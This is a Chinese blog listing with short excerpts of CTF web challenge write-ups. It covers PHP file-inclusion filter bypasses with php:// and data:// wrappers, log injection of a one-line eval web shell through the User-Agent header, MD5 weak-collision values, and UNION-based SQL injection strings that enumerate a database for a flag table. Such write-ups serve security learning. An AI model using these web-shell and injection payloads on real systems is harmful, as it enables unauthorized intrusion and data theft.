菜鸡的Web之旅
Lig_HossssT
这个作者很懒,什么都没留下…
展开
-
菜鸡的web之旅 攻防世界 Web_php_include
题目通过strstr()函数过滤了php:// 方法1 strstr函数是一个大小写敏感的函数 因此可以将php://改为PHP://从而绕过 再cat 方法2 既然过滤了php://的伪协议 我们可以使用data://伪协议 php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码 方法三 据说还可以传木马 但是我实践失败了(乌乌 ...原创 2020-11-13 17:34:40 · 87 阅读 · 0 评论 -
菜鸡的web之旅 ctfshow web4
日志注入User-agent:xxxx <?php @eval($_POST[a]);?> xxx原创 2020-10-29 00:39:43 · 179 阅读 · 0 评论 -
菜鸡的web之旅 ctfshow web3
php伪协议+文件包含+命令执行 掏出burpsuite 还没学php 看dalao的wp跟着做的 第一次用burpsuite = = 捣鼓了好久原创 2020-10-27 22:56:58 · 414 阅读 · 0 评论 -
CTFshow web5
打开题目 显然是个有限制条件的md5弱碰撞 ctype_alpha检测是否为字母 is_numeric检测是否为数字 取v1=QNKCDZO v2=240610708 即可得到flag原创 2020-10-24 20:56:13 · 177 阅读 · 0 评论 -
TSCTF-J 菜鸡的第一个HTML
打开题目 听到歌 点击F12 进入bilibili 由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari 顺便说一句 这个题目描述就是用来生草的XDD原创 2020-10-24 16:04:51 · 182 阅读 · 0 评论 -
TSCTF-J EasyF12
点击F12( 进入game1 发现移动并没有什么卵用 点击F12( 把disabled消掉 点击按钮进入game2 (或者直接进game2.php 点一次训练按钮会消失很久 所以 点击F12 fina1.php一片空白 点击F12 发现是md5碰撞 强弱碰撞都有 掏出fastcoll 得到flag ...原创 2020-10-24 16:05:20 · 193 阅读 · 0 评论 -
CTFshow Web2
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...原创 2020-10-09 23:17:06 · 414 阅读 · 0 评论